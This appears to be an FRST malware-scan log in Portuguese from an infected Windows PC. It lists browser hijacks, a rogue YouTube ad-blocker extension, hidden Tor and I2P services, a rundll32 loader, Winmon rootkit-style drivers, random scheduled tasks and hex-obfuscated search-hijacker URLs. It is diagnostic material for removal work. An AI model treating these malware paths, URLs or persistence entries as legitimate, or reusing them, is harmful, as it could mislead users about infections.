BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_171\bin\jp2ssv.dll [2018-04-27] (Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-11-18] (Microsoft Corporation)
BHO-x32: PDF Architect 4 Helper -> {38279E1A-7019-40C1-B579-E99DFB3312E8} -> C:\Program Files (x86)\PDF Architect 4\creator-ie-helper.dll [2016-08-05] (pdfforge GmbH)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\kw0GKrTQ.dll [2018-06-05] ()
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-11-10] (Microsoft Corporation)
Toolbar: HKLM-x32 - PDF Architect 4 Toolbar - {23FD9C33-A9E1-48A1-8404-E5925CF1C8E1} - C:\Program Files (x86)\PDF Architect 4\creator-ie-plugin.dll [2016-08-05] (pdfforge GmbH)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: 89pi56hk.default-1461610134366
FF ProfilePath: C:\Users\Alessandra\AppData\Roaming\Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 [2018-06-05]
FF Homepage: Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 -> file:///C:/ProgramData/Kipolams/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 -> file:///C:/ProgramData/Kipolams/ff.NT
FF SearchPlugin: C:\Users\Alessandra\AppData\Roaming\Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366\searchplugins\yahoo-lavasoft.xml [2013-05-03]
FF Extension: (Adblocker para o Youtube™) - C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-06-05] [Legacy] [não assinado]
FF HKLM\...\Firefox\Extensions: [pdf_architect_4_conv@pdfarchitect.org] - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension
FF Extension: (PDF Architect 4 Creator) - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension [2016-11-24] [Legacy] [não assinado]
FF HKLM-x32\...\Firefox\Extensions: [{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}] - C:\Program Files (x86)\PremierOpinion\firefox
FF Extension: (PremierOpinion) - C:\Program Files (x86)\PremierOpinion\firefox [2017-05-25] [Legacy] [não assinado]
FF HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\cef\xpi
FF Extension: (GBBD Caixa Economica Federal) - C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\cef\xpi [2015-12-26] [Legacy] [não assinado]
FF HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Firefox\Extensions: [{6EBED4D8-13D9-4270-8D44-B57DDB7A787C}] - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDFirefoxExt
FF Extension: (Allavsoft Video Downloader Firefox Extension) - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDFirefoxExt [2018-02-09] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.171.2 -> C:\Program Files\Java\jre1.8.0_171\bin\dtplugin\npDeployJava1.dll [2018-04-27] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.171.2 -> C:\Program Files\Java\jre1.8.0_171\bin\plugin2\npjp2.dll [2018-04-27] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-05-10] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: PDF Architect 4 -> C:\Program Files (x86)\PDF Architect 4\np-previewer.dll [2016-08-05] (pdfforge GmbH)
FF Plugin HKU\S-1-5-21-1322778411-14668823-402750941-1000: gastecnologia.com.br/sf/cef -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [2014-12-09] (GAS Tecnologia)
FF Plugin HKU\S-1-5-21-1322778411-14668823-402750941-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [2014-12-09] (GAS Tecnologia)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\autoconf_warsaw.js [2018-06-06]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-06-06] <==== ATENÇÃO

Chrome:
=======
CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UxiJsMD8bFj13NSVQsY2s7ErvpVe5wOB_o9ukuE2wrbpTDXjwYHbIlDqMHEB07A-WU5VnvhdKmP1Eaey9CAAIb8Wylg,
CHR StartupUrls: Default -> "hxxp://www.google.com.br/"
CHR DefaultSearchURL: Default -> hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UxTawFo4HG5wyRIwvY6xxCXUVASk4FO2EQvlC1sJecd3d9g2lR465FcXbBhtkrYkzF7pCmL3Z5B7vbyJAE1Mbf87Rm0,&q={searchTerms}
CHR DefaultSearchKeyword: Default -> feed.sonic-search.com
CHR Profile: C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default [2018-06-06]
CHR Extension: (Apresentações) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-05]
CHR Extension: (Documentos) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-17]
CHR Extension: (Google Drive) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-18]
CHR Extension: (Web Signer) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbafmabaelnnkondpfpjmdklbmfnbmol [2018-01-08]
CHR Extension: (Adblocker para o Youtube™) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbfneagfdkkcpjojiigmahjplnbppkff [2018-06-05] [UpdateUrl: hxxps://clients88.google.com/service/update2/crx] <==== ATENÇÃO
CHR Extension: (YouTube) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-18]
CHR Extension: (Adblock Plus) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2018-05-17]
CHR Extension: (Google Search) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-18]
CHR Extension: (Allavsoft video downloader converter) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhancbnhabhandieicagelcddkdfgoif [2018-02-09]
CHR Extension: (Planilhas) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-05]
CHR Extension: (Documentos Google off-line) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (Certisign) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\jjoehgfmpefldljiipnmgnfmcbfjkaad [2018-01-16]
CHR Extension: (Skype) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-05-02]
CHR Extension: (Search Manager) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce [2018-05-25]
CHR Extension: (Bazz Search) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-06-05]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-06]
CHR Extension: (Gmail) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-18]
CHR Extension: (Chrome Media Router) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-05-04]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1322778411-14668823-402750941-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dhancbnhabhandieicagelcddkdfgoif] - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDChromeExt.crx [2018-02-09]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx

==================== Serviços (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R2 5850f7899b7a00e77740675180ff5f97; C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe [1864224 2018-06-05] ()
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1353208 2017-06-15] (Autodesk Inc.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems, Incorporated)
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-06-05] () [Arquivo não assinado] <==== ATENÇÃO
S2 dahkService; C:\ProgramData\dahkService\dahkService.exe [423152 2018-06-05] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [332656 2018-05-02] (HP Inc.)
R2 HPTouchpointAnalyticsService; C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe [332216 2017-11-24] (HP Inc.)
R2 Kipolam; C:\ProgramData\\Kipolam\\Kipolam.exe [1810944 2018-06-05] (TODO: ) [Arquivo não assinado]
S3 NBService; C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe [774144 2007-01-05] (Nero AG) [Arquivo não assinado]
R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-06-06] () [Arquivo não assinado] <==== ATENÇÃO
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [262144 2006-12-23] (Nero AG) [Arquivo não assinado]
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [166912 2013-10-17] () [Arquivo não assinado]
S3 PDF Architect 4; C:\Program Files\PDF Architect 4\ws.exe [2438880 2016-08-05] (pdfforge GmbH)
S3 PDF Architect 4 CrashHandler; C:\Program Files\PDF Architect 4\crash-handler-ws.exe [1038048 2016-08-05] (pdfforge GmbH)
R2 PDF Architect 4 Creator; C:\Program Files\PDF Architect 4\creator-ws.exe [851168 2016-08-05] (pdfforge GmbH)
R2 PDF Architect 4 Manager; C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe [972056 2016-05-18] (© pdfforge GmbH.)
R2 PremierOpinion; C:\Program Files (x86)\PremierOpinion\pmservice.exe [208320 2018-01-11] (VoiceFive, Inc.) <==== ATENÇÃO
S2 ResTCPSvc; C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe [5186560 2018-06-05] (Purple I2P) [Arquivo não assinado] <==== ATENÇÃO
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop66.exe [517432 2018-05-21] (PandaViewer)
R2 SamsungUPDUtilSvc; C:\Windows\SysWOW64\SecUPDUtilSvc.exe [143664 2015-12-18] ()
R2 SWUpdateService; C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe [3025248 2015-07-07] (Samsung Electronics CO., LTD.)
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [1068376 2017-12-14] (GAS Tecnologia LTDA)
R2 WeatherLiteService; C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe [149136 2017-03-31] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [1435136 2018-06-05] ()
R2 66d6d2adcf3338fb0d0ff7dd431cfd88; rundll32.exe C:\Windows\zmtcxviskgfclpcu.zztcx nIgiF [X]
R2 TCPSvc; "C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\t" <==== ATENÇÃO

===================== Drivers (Whitelisted) ======================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R3 cbfs3; C:\Windows\System32\DRIVERS\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R1 d9f123ea30f4c200a5898caa9c1b70f5; C:\Windows\System32\drivers\d9f123ea30f4c200a5898caa9c1b70f5.sys [144696 2018-06-05] ()
S3 GemCCID; C:\Windows\System32\DRIVERS\GemCCID.sys [119680 2009-08-10] (Gemalto)
R2 SSPORT; C:\Windows\SysWOW64\Drivers\SSPORT.sys [11576 2009-10-28] (Samsung Electronics)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-17] (Apple, Inc.) [Arquivo não assinado]
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2018-06-05] () [Arquivo não assinado]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2018-06-05] (Windows (R) Win 7 DDK provider) [Arquivo não assinado]
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-05] () [Arquivo não assinado] <==== ATENÇÃO
S1 wsddfac; C:\Windows\System32\drivers\wsddfac.sys [28376 2018-06-05] (GAS Tecnologia)
R1 wsddntf; C:\Windows\System32\DRIVERS\wsddntf.sys [36984 2016-06-16] (GAS Tecnologia)
S1 wsddpp; C:\Windows\system32\drivers\wsddpp.sys [44624 2017-12-14] (GAS Tecnologia)
R3 wsddprm; C:\Windows\system32\drivers\wsddprm.sys [43560 2018-04-10] (GAS Tecnologia)
U0 aswVmm; não ImagePath
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 SBIOSIO; \??\C:\Users\ALESSA~1\AppData\Local\Temp\__Samsung_Update\SBIOSIO64.sys [X] <==== ATENÇÃO

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Três Meses Criados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2018-06-06 07:59 - 2018-06-06 08:00 - 000039444 _____ C:\Users\Alessandra\Desktop\FRST.txt
2018-06-06 07:59 - 2018-06-06 07:59 - 000000000 ____D C:\FRST
2018-06-06 07:58 - 2018-06-06 07:59 - 002413056 _____ (Farbar) C:\Users\Alessandra\Desktop\FRST64.exe
2018-06-06 07:48 - 2018-06-06 07:48 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a
2018-06-06 07:48 - 2018-06-06 07:48 - 000000000 ____D C:\Program Files\DPGD3TU7OG
2018-06-06 07:46 - 2018-06-06 07:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremierOpinion
2018-06-06 07:45 - 2018-06-06 07:45 - 000003258 _____ C:\Windows\System32\Tasks\psv_SaoLex
2018-06-05 22:50 - 2018-06-05 22:57 - 000209682 _____ C:\Windows\ntbtlog.txt
2018-06-05 22:36 - 2018-06-05 22:36 - 000013113 _____ C:\Users\Alessandra\Desktop\Explorer.lnk
2018-06-05 22:26 - 2018-06-05 22:26 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\MAL
2018-06-05 22:24 - 2018-06-05 22:24 - 000003058 _____ C:\Windows\System32\Tasks\XLqsfoKFUKuTqG
2018-06-05 22:24 - 2018-06-05 22:24 - 000002890 _____ C:\Windows\System32\Tasks\WobUIKhuMtTTi2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002872 _____ C:\Windows\System32\Tasks\KnPQHVchzdGfrlHaz2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002860 _____ C:\Windows\System32\Tasks\TdqeVjasHzsikvrWtEm2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002850 _____ C:\Windows\System32\Tasks\rArHIXNWKfbeRtR2
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Users\Todos os Usuários\XjOPTLXDzAynQaVB
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\wCCFxMJCsZmzC
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\OxoywZINBbQwrioRGrR
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\ijcQGTqqPStU2
2018-06-05 22:23 - 2018-06-05 22:23 - 000000286 __RSH C:\Users\Alessandra\ntuser.pol
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Program Files\22F4FU47HD
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Program Files (x86)\lJFUJMGEHIE
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ C:\Users\Todos os Usuários\lock.dat
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-05 22:22 - 2018-06-06 07:44 - 000000008 _____ C:\Users\Todos os Usuários\rwi.khad
2018-06-05 22:22 - 2018-06-06 07:44 - 000000008 _____ C:\ProgramData\rwi.khad
2018-06-05 22:21 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\EgDGbQEiU
2018-06-05 22:21 - 2018-06-05 22:21 - 000000000 ____D C:\Program Files (x86)\iRmKFyAZyPUn
2018-06-05 22:20 - 2018-06-05 22:20 - 397930967 _____ C:\Windows\MEMORY.DMP
2018-06-05 22:20 - 2018-06-05 22:20 - 000262144 _____ C:\Windows\Minidump\060518-27144-01.dmp
2018-06-05 22:14 - 2018-06-05 22:14 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\agmSoNKAoyIez
2018-06-05 22:13 - 2018-06-05 22:13 - 000001889 _____ C:\Users\Alessandra\Desktop\PandaViewer.lnk
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\Users\Todos os Usuários\yahoochrome_D
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\Program Files (x86)\PandaViewer
2018-06-05 22:12 - 2018-06-05 22:12 - 000003578 _____ C:\Windows\System32\Tasks\FastDataX Task
2018-06-05 22:11 - 2018-06-05 22:11 - 000003266 _____ C:\Windows\System32\Tasks\psv_Donfresh
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Todos os Usuários\Logic Cramble
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\SystemHealer
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\X4NT86L8PB
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\My Program
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\F20NRXHM4L
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-06-05 22:11 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-06-05 22:10 - 2018-06-06 07:52 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-06-05 22:10 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\D01R7PS11V
2018-06-05 22:10 - 2018-06-05 22:10 - 000000975 _____ C:\Users\Alessandra\Desktop\Speedycar.lnk
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\OneSystemCare
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\FastDataX
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Program Files (x86)\Speedycar
2018-06-05 22:09 - 2018-06-05 22:16 - 000000000 ____D C:\Program Files (x86)\bestDownloader
2018-06-05 22:09 - 2018-06-05 22:11 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Todos os Usuários\Kipolams
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\ProgramData\Kipolams
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\Program Files\5850f7899b7a00e77740675180ff5f97
2018-06-05 22:09 - 2018-06-05 22:09 - 000959488 _____ C:\Windows\zmtcxviskgfclpcu.zztcx
2018-06-05 22:09 - 2018-06-05 22:09 - 000003270 _____ C:\Windows\System32\Tasks\psv_Sumtough
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\EpicNet Inc
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files\XXWL8VTRHR
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files\1J8EIRX58C
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files (x86)\bf1o5vdufsa
2018-06-05 22:08 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Local\WhiteClick
2018-06-05 22:08 - 2018-06-05 22:08 - 001435136 ____H C:\Windows\windefender.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-06-05 22:08 - 2018-06-05 22:08 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2018-06-05 22:08 - 2018-06-05 22:08 - 000003690 _____ C:\Windows\System32\Tasks\{97FB065C-8365-8037-2DFF-FC795566A9AC}
2018-06-05 22:08 - 2018-06-05 22:08 - 000003454 _____ C:\Windows\System32\Tasks\{D9E77BE1-6B7C-88AD-F011-BB3053FAFBC7}
2018-06-05 22:08 - 2018-06-05 22:08 - 000003260 _____ C:\Windows\System32\Tasks\psv_Goodlex
2018-06-05 22:08 - 2018-06-05 22:08 - 000000003 _____ C:\Users\Alessandra\AppData\Local\wbem.ini
2018-06-05 22:07 - 2018-06-06 07:45 - 000000000 ____D C:\Users\Todos os Usuários\Kipolam
2018-06-05 22:07 - 2018-06-06 07:45 - 000000000 ____D C:\ProgramData\Kipolam
2018-06-05 22:07 - 2018-06-05 22:07 - 007627776 _____ C:\Users\Alessandra\AppData\Local\agent.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 001987953 _____ C:\Users\Alessandra\AppData\Local\ScotJob.tst
2018-06-05 22:07 - 2018-06-05 22:07 - 001895384 _____ C:\Users\Alessandra\AppData\Local\DamTantax.bin
2018-06-05 22:07 - 2018-06-05 22:07 - 000126464 _____ C:\Users\Alessandra\AppData\Local\noah.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000070896 _____ C:\Users\Alessandra\AppData\Local\Config.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 000018432 _____ C:\Users\Alessandra\AppData\Local\Main.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2018-06-05 22:07 - 2018-06-05 22:07 - 000005568 _____ C:\Users\Alessandra\AppData\Local\md.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 000001100 _____ C:\Users\Alessandra\Desktop\Adult Dating.lnk
2018-06-05 22:07 - 2018-06-05 22:07 - 000001096 _____ C:\Users\Alessandra\Desktop\Play Warframe.lnk
